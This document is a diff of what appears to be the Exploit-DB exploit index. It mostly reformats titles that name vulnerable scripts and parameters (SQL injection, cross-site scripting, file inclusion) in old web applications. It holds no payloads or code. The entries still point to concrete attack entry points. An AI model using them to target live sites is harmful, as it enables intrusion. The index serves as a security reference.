-27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - domains.asp txtDomainName Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - default.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 +27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'domains.asp?txtDomainName' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 +27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 27488,platforms/cgi/webapps/27488.txt,"BlankOL 1.0 - Bol.cgi Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,cgi,webapps,0 27489,platforms/cfm/webapps/27489.txt,"FusionZONE CouponZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps,0 27490,platforms/cfm/webapps/27490.txt,"ClassifiedZONE 1.2 - Accountlogon.cfm Cross-Site Scripting",2006-03-28,r0t,cfm,webapps,0 27491,platforms/cfm/webapps/27491.txt,"FusionZONE CouponZONE 4.2 - Multiple SQL Injections",2006-03-27,r0t,cfm,webapps,0 27492,platforms/php/webapps/27492.txt,"ActiveCampaign SupportTrio 2.50.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,php,webapps,0 27493,platforms/cfm/webapps/27493.txt,"RealestateZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps,0 -27497,platforms/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 - shared_order.php sharedPlanID Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 -27498,platforms/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 - dedicated_order.php dedicatedPlanID Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 -27499,platforms/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 - server_management.php plan_id Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 +27497,platforms/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 - 'shared_order.php?sharedPlanID' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 +27498,platforms/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 - 'dedicated_order.php?dedicatedPlanID' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 +27499,platforms/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 - 'server_management.php?plan_id' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27500,platforms/php/webapps/27500.txt,"Arab Portal 2.0 - 'online.php' Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0 27501,platforms/php/webapps/27501.txt,"Arab Portal 2.0 - 'download.php' Cross-Site Scripting",2006-03-28,o.y.6,php,webapps,0 -27502,platforms/php/webapps/27502.txt,"Connect Daily 3.2.8/3.2.9 - ViewDay.html Multiple Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 -27503,platforms/php/webapps/27503.txt,"Connect Daily 3.2.8/3.2.9 - ViewSearch.html Multiple Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 -27504,platforms/php/webapps/27504.txt,"Connect Daily 3.2.8/3.2.9 - ViewYear.html Multiple Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 +27502,platforms/php/webapps/27502.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewDay.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,php,webapps,0 +27503,platforms/php/webapps/27503.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewSearch.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,php,webapps,0 +27504,platforms/php/webapps/27504.txt,"Connect Daily 3.2.8/3.2.9 - 'ViewYear.html' Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,php,webapps,0 27505,platforms/php/webapps/27505.txt,"Connect Daily 3.2.8/3.2.9 - ViewCal.html item_type_id Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27506,platforms/php/webapps/27506.txt,"Connect Daily 3.2.8/3.2.9 - ViewWeek.html week Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27507,platforms/php/webapps/27507.txt,"AL-Caricatier 2.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,Linux_Drox,php,webapps,0 27509,platforms/php/webapps/27509.txt,"OneOrZero 1.6.3 Helpdesk - 'index.php' SQL Injection",2006-03-28,Preddy,php,webapps,0 -27510,platforms/php/webapps/27510.txt,"PhxContacts 0.93 - carnet.php Multiple Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 -27511,platforms/php/webapps/27511.txt,"PhxContacts 0.93 - contact_view.php id_contact Parameter SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 +27510,platforms/php/webapps/27510.txt,"PhxContacts 0.93 - 'carnet.php' Multiple SQL Injections",2006-03-29,"Morocco Security Team",php,webapps,0 +27511,platforms/php/webapps/27511.txt,"PhxContacts 0.93 - 'contact_view.php?id_contact' SQL Injection",2006-03-29,"Morocco Security Team",php,webapps,0 27512,platforms/php/webapps/27512.txt,"PhxContacts 0.93 - 'login.php' Cross-Site Scripting",2006-03-29,DaBDouB-MoSiKaR,php,webapps,0 27513,platforms/php/webapps/27513.txt,"VNews 1.2 - Multiple SQL Injections",2006-03-30,"Aliaksandr Hartsuyeu",php,webapps,0 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Cross-Site Request Forgery (Adding/Editing New Administrator Account)",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0 -27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php id' Parameter SQL Injection",2013-08-12,3spi0n,php,webapps,0 +27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php?id' SQL Injection",2013-08-12,3spi0n,php,webapps,0 27519,platforms/php/webapps/27519.txt,"PHPVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 - 'index.php' Cross-Site Scripting",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 @@ -29885,21 +29886,21 @@ id,file,description,date,author,platform,type,port 27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - 'post.php' SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0 27536,platforms/asp/webapps/27536.txt,"SiteSearch Indexer 3.5 - searchresults.asp Cross-Site Scripting",2006-03-31,r0t,asp,webapps,0 27537,platforms/php/webapps/27537.txt,"Warcraft III Replay Parser for PHP 1.8.c - 'index.php' Remote File Inclusion",2006-03-31,botan,php,webapps,0 -27538,platforms/php/webapps/27538.txt,"RedCMS 0.1 - profile.php u Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 -27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 - 'login.php' Multiple Parameter SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 -27540,platforms/php/webapps/27540.txt,"RedCMS 0.1 - register.php Multiple Field Cross-Site Scripting",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 -27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery - suggest_image.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery - insert_rating.php img_id Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 -27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery - images.php cid Parameter SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27538,platforms/php/webapps/27538.txt,"RedCMS 0.1 - 'profile.php?u' SQL Injection",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 +27539,platforms/php/webapps/27539.txt,"RedCMS 0.1 - 'login.php' Multiple SQL Injections",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 +27540,platforms/php/webapps/27540.txt,"RedCMS 0.1 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-31,"Aliaksandr Hartsuyeu",php,webapps,0 +27544,platforms/php/webapps/27544.txt,"SoftBiz Image Gallery - 'suggest_image.php?cid' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27545,platforms/php/webapps/27545.txt,"SoftBiz Image Gallery - 'insert_rating.php?img_id' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 +27546,platforms/php/webapps/27546.txt,"SoftBiz Image Gallery - 'images.php?cid' SQL Injection",2006-03-31,Linux_Drox,php,webapps,0 27548,platforms/php/webapps/27548.txt,"Claroline 1.x - rqmkhtml.php Information Disclosure",2006-03-31,rgod,php,webapps,0 27549,platforms/php/webapps/27549.txt,"Claroline 1.x - rqmkhtml.php Cross-Site Scripting",2006-03-31,rgod,php,webapps,0 27550,platforms/php/webapps/27550.txt,"Blank'N'Berg 0.2 - Directory Traversal",2006-03-31,"Amine ABOUD",php,webapps,0 27551,platforms/php/webapps/27551.txt,"Blank'N'Berg 0.2 - Cross-Site Scripting",2006-03-31,"Amine ABOUD",php,webapps,0 27552,platforms/asp/webapps/27552.txt,"ISP Site Man - admin_login.asp SQL Injection",2006-04-01,s3rv3r_hack3r,asp,webapps,0 27558,platforms/jsp/webapps/27558.txt,"Bugzero 4.3.1 - query.jsp msg Parameter Cross-Site Scripting",2006-04-03,r0t,jsp,webapps,0 -27559,platforms/jsp/webapps/27559.txt,"Bugzero 4.3.1 - edit.jsp Multiple Parameter Cross-Site Scripting",2006-04-03,r0t,jsp,webapps,0 +27559,platforms/jsp/webapps/27559.txt,"Bugzero 4.3.1 - 'edit.jsp' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,jsp,webapps,0 27560,platforms/php/webapps/27560.txt,"aWebNews 1.2 - 'visview.php' _GET['cid'] Parameter SQL Injection",2006-04-03,"Aliaksandr Hartsuyeu",php,webapps,0 -27561,platforms/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x - index.cgi Multiple Parameter Cross-Site Scripting",2006-04-03,r0t,cgi,webapps,0 +27561,platforms/cgi/webapps/27561.txt,"Web-APP.net WebAPP 0.9.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,r0t,cgi,webapps,0 27562,platforms/cgi/webapps/27562.txt,"Web-APP.net WebAPP 0.9.x - mods/calendar/index.cgi vsSD Parameter Cross-Site Scripting",2006-04-03,r0t,cgi,webapps,0 27563,platforms/php/webapps/27563.txt,"LucidCMS 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-04-03,"Rusydi Hasan",php,webapps,0 27567,platforms/php/webapps/27567.txt,"ArabPortal 2.0.1 - Multiple Input Validation Vulnerabilities",2006-04-04,o.y.6,php,webapps,0 @@ -29916,8 +29917,8 @@ id,file,description,date,author,platform,type,port 27582,platforms/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 - Cross-Site Scripting",2006-04-07,benozor77,php,webapps,0 27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - Deptname Parameter Cross-Site Scripting",2006-04-07,r0t,cgi,webapps,0 27584,platforms/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 -27585,platforms/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 -27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php type' Parameter CRLF Injection",2006-04-10,Psych0,php,webapps,0 +27585,platforms/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 +27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,php,webapps,0 27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0 @@ -29934,19 +29935,19 @@ id,file,description,date,author,platform,type,port 27603,platforms/php/webapps/27603.txt,"w-CMS 2.0.1 - Remote Code Execution",2013-08-15,ICheer_No0M,php,webapps,0 27605,platforms/php/webapps/27605.txt,"Alibaba Clone Tritanium Version - 'news_desc.html' SQL Injection",2013-08-15,IRAQ_JAGUAR,php,webapps,0 27612,platforms/php/webapps/27612.txt,"ShopWeezle 2.0 - 'login.php' itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 -27613,platforms/php/webapps/27613.txt,"ShopWeezle 2.0 - 'index.php' Multiple Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 -27614,platforms/php/webapps/27614.txt,"ShopWeezle 2.0 - memo.php itemID Parameter SQL Injection",2006-04-10,r0t,php,webapps,0 +27613,platforms/php/webapps/27613.txt,"ShopWeezle 2.0 - 'index.php' Multiple SQL Injections",2006-04-10,r0t,php,webapps,0 +27614,platforms/php/webapps/27614.txt,"ShopWeezle 2.0 - 'memo.php?itemID' SQL Injection",2006-04-10,r0t,php,webapps,0 27615,platforms/php/webapps/27615.txt,"AzDGVote - Remote File Inclusion",2006-04-11,SnIpEr_SA,php,webapps,0 -27616,platforms/php/webapps/27616.txt,"JetPhoto 1.0/2.0/2.1 - thumbnail.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 -27617,platforms/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - gallery.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 -27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - Slideshow.php name Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 -27619,platforms/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - detail.php page Parameter Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 +27616,platforms/php/webapps/27616.txt,"JetPhoto 1.0/2.0/2.1 - 'thumbnail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 +27617,platforms/php/webapps/27617.txt,"JetPhoto 1.0/2.0/2.1 - 'gallery.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 +27618,platforms/php/webapps/27618.txt,"JetPhoto 1.0/2.0/2.1 - 'Slideshow.php?name' Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 +27619,platforms/php/webapps/27619.txt,"JetPhoto 1.0/2.0/2.1 - 'detail.php?page' Cross-Site Scripting",2006-04-11,0o_zeus_o0,php,webapps,0 27620,platforms/cgi/webapps/27620.txt,"Microsoft FrontPage - Server Extensions Cross-Site Scripting",2006-04-11,"Esteban Martinez Fayo",cgi,webapps,0 27621,platforms/php/webapps/27621.txt,"Clever Copy 3.0 - 'Connect.INC' Information Disclosure",2006-04-11,"M.Hasran Addahroni",php,webapps,0 27622,platforms/php/webapps/27622.txt,"Dokeos 1.x - viewtopic.php SQL Injection",2006-04-11,"Alvaro Olavarria",php,webapps,0 27623,platforms/php/webapps/27623.txt,"SWSoft Confixx 3.1.2 - Jahr Parameter Cross-Site Scripting",2006-04-11,Snake_23,php,webapps,0 27624,platforms/php/webapps/27624.txt,"PHPKIT 1.6.1 R2 - Include.php SQL Injection",2006-04-11,"Hamid Ebadi",php,webapps,0 -27625,platforms/php/webapps/27625.txt,"Indexu 5.0 - Multiple Remote File Inclusion",2006-04-11,SnIpEr_SA,php,webapps,0 +27625,platforms/php/webapps/27625.txt,"Indexu 5.0 - Multiple Remote File Inclusions",2006-04-11,SnIpEr_SA,php,webapps,0 27626,platforms/php/webapps/27626.txt,"Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-11,d4igoro,php,webapps,0 27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 - 'index.php' SQL Injection",2006-04-11,LoK-Crew,php,webapps,0 27629,platforms/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 - 'index.php' SQL Injection",2006-04-12,Dr.Jr7,php,webapps,0 @@ -29992,32 +29993,32 @@ id,file,description,date,author,platform,type,port 27683,platforms/cgi/webapps/27683.txt,"CommuniMail 1.2 - templates.cgi form_id Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27684,platforms/jsp/webapps/27684.txt,"Cisco Wireless Lan Solution Engine - ArchiveApplyDisplay.jsp Cross-Site Scripting",2006-04-19,"Adam Pointon",jsp,webapps,0 27685,platforms/cgi/webapps/27685.txt,"IntelliLink Pro 5.06 - addlink_lwp.cgi url Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 -27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - edit.cgi Multiple Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 +27686,platforms/cgi/webapps/27686.txt,"IntelliLink Pro 5.06 - 'edit.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27687,platforms/php/webapps/27687.txt,"ThWboard 2.8 - showtopic.php SQL Injection",2006-04-19,Qex,php,webapps,0 27688,platforms/php/webapps/27688.txt,"ContentBoxx - 'login.php' Cross-Site Scripting",2006-04-19,botan,php,webapps,0 27689,platforms/cgi/webapps/27689.txt,"BannerFarm 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 -27690,platforms/cgi/webapps/27690.txt,"xFlow 5.46.11 - index.cgi Multiple Parameter SQL Injection",2006-04-19,r0t,cgi,webapps,0 -27691,platforms/cgi/webapps/27691.txt,"xFlow 5.46.11 - index.cgi Multiple Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 +27690,platforms/cgi/webapps/27690.txt,"xFlow 5.46.11 - 'index.cgi' Multiple SQL Injections",2006-04-19,r0t,cgi,webapps,0 +27691,platforms/cgi/webapps/27691.txt,"xFlow 5.46.11 - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27692,platforms/php/webapps/27692.txt,"Plexum PlexCart X5 - Multiple SQL Injections",2006-04-19,r0t,php,webapps,0 -27693,platforms/php/webapps/27693.txt,"otalCalendar - about.php inc_dir Parameter Remote File Inclusion",2006-04-19,VietMafia,php,webapps,0 +27693,platforms/php/webapps/27693.txt,"otalCalendar - 'about.php?inc_dir' Remote File Inclusion",2006-04-19,VietMafia,php,webapps,0 27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWStats.pl Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 -27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - sendim.cgi Multiple Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 -27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi 'Username' Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 +27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - 'sendim.cgi' Multiple Cross-Site Scripting Vulnerabilities",2006-04-20,r0t,cgi,webapps,0 +27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi 'Username' Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi Password Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 28055,platforms/hardware/webapps/28055.txt,"TP-Link TD-W8951ND - Multiple Vulnerabilities",2013-09-03,xistence,hardware,webapps,0 28057,platforms/php/webapps/28057.txt,"Cline Communications - Multiple SQL Injections",2006-06-17,Liz0ziM,php,webapps,0 28058,platforms/php/webapps/28058.txt,"Eduha Meeting - 'index.php' Arbitrary File Upload",2006-06-19,Liz0ziM,php,webapps,0 28061,platforms/asp/webapps/28061.txt,"Cisco CallManager 3.x/4.x - Web Interface 'ccmadmin/phonelist.asp' Pattern Parameter Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - Web Interface 'ccmuser/logon.asp' Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 -28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - view_order.php order_id Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 +28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - 'view_order.php?order_id' Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 28054,platforms/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - 'Common.php' Remote File Inclusion",2006-04-20,r0t,php,webapps,0 27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - 'member.php' Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 -27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 -27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - inc/function.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 -27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - search.php q Parameter Cross-Site Scripting",2006-06-05,Luny,php,webapps,0 +27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - 'inc/common.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27976,platforms/php/webapps/27976.txt,"Bookmark4U 2.0 - 'inc/function.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27977,platforms/php/webapps/27977.txt,"Kmita FAQ 1.0 - 'search.php?q' Cross-Site Scripting",2006-06-05,Luny,php,webapps,0 27978,platforms/php/webapps/27978.txt,"Kmita FAQ 1.0 - 'index.php' catid Parameter SQL Injection",2006-06-05,Luny,php,webapps,0 28694,platforms/php/webapps/28694.txt,"vBulletin 2.3.x - global.php SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0 27711,platforms/php/webapps/27711.txt,"ThWboard 3.0 - 'index.php' Cross-Site Scripting",2006-04-20,"CrAzY CrAcKeR",php,webapps,0 @@ -30032,15 +30033,15 @@ id,file,description,date,author,platform,type,port 27724,platforms/php/webapps/27724.txt,"Scry Gallery - Directory Traversal",2006-04-21,"Morocco Security Team",php,webapps,0 27725,platforms/php/webapps/27725.txt,"MKPortal 1.1 - Multiple Input Validation Vulnerabilities",2006-04-22,"Mustafa Can Bjorn IPEKCI",php,webapps,0 27726,platforms/php/webapps/27726.txt,"Simplog 0.9.3 - ImageList.php Cross-Site Scripting",2006-04-22,nukedx,php,webapps,0 -27731,platforms/php/webapps/27731.txt,"PhotoKorn 1.53/1.54 - 'index.php' Multiple Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 -27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - 'id' Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 -27733,platforms/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - print.php cat Parameter SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 +27731,platforms/php/webapps/27731.txt,"PhotoKorn 1.53/1.54 - 'index.php' Multiple SQL Injections",2006-04-25,Dr.Jr7,php,webapps,0 +27732,platforms/php/webapps/27732.txt,"PhotoKorn 1.53/1.54 - 'id' SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 +27733,platforms/php/webapps/27733.txt,"PhotoKorn 1.53/1.54 - 'print.php?cat' SQL Injection",2006-04-25,Dr.Jr7,php,webapps,0 27734,platforms/php/webapps/27734.txt,"NextAge Shopping Cart - Multiple HTML Injection Vulnerabilities",2006-04-25,R@1D3N,php,webapps,0 27735,platforms/php/webapps/27735.txt,"PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-25,arko.dhar,php,webapps,0 27736,platforms/php/webapps/27736.txt,"Invision Power Board 2.0/2.1 - 'index.php' CK Parameter SQL Injection",2006-05-25,IceShaman,php,webapps,0 -27737,platforms/php/webapps/27737.txt,"Instant Photo Gallery 1.0 - member.php member Parameter Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 -27738,platforms/php/webapps/27738.txt,"Instant Photo Gallery 1.0 - portfolio.php cat_id Parameter Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 -27739,platforms/php/webapps/27739.txt,"Instant Photo Gallery 1.0 - portfolio_photo_popup.php id Parameter Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 +27737,platforms/php/webapps/27737.txt,"Instant Photo Gallery 1.0 - 'member.php?member' Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 +27738,platforms/php/webapps/27738.txt,"Instant Photo Gallery 1.0 - 'portfolio.php?cat_id' Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 +27739,platforms/php/webapps/27739.txt,"Instant Photo Gallery 1.0 - 'portfolio_photo_popup.php?id' Cross-Site Scripting",2006-04-25,Qex,php,webapps,0 27740,platforms/php/webapps/27740.txt,"CuteNews 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,outlaw.dll,php,webapps,0 27741,platforms/php/webapps/27741.txt,"Farsinews 2.5.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-26,O.U.T.L.A.W.,php,webapps,0 27742,platforms/php/webapps/27742.txt,"DevBB 1.0 - member.php Cross-Site Scripting",2006-04-26,Qex,php,webapps,0 @@ -30058,13 +30059,13 @@ id,file,description,date,author,platform,type,port 27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod - Weblog_posting.php SQL Injection",2006-04-29,Qex,php,webapps,0 27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80 27855,platforms/php/webapps/27855.txt,"Vizra - A_Login.php Cross-Site Scripting",2006-05-11,R00TT3R,php,webapps,0 -27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 +27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - 'charts.php?id' SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 27774,platforms/hardware/webapps/27774.py,"NETGEAR ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 27776,platforms/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 -27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 +27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - 'top.php?sessionid' SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - 'member.php' sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 - BBCode Script Injection",2006-04-29,r0xes,php,webapps,0 @@ -30072,70 +30073,70 @@ id,file,description,date,author,platform,type,port 27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion",2006-05-01,beford,php,webapps,0 27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion",2006-05-01,[Oo],php,webapps,0 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,php,webapps,0 -27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 - signup.php referral Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 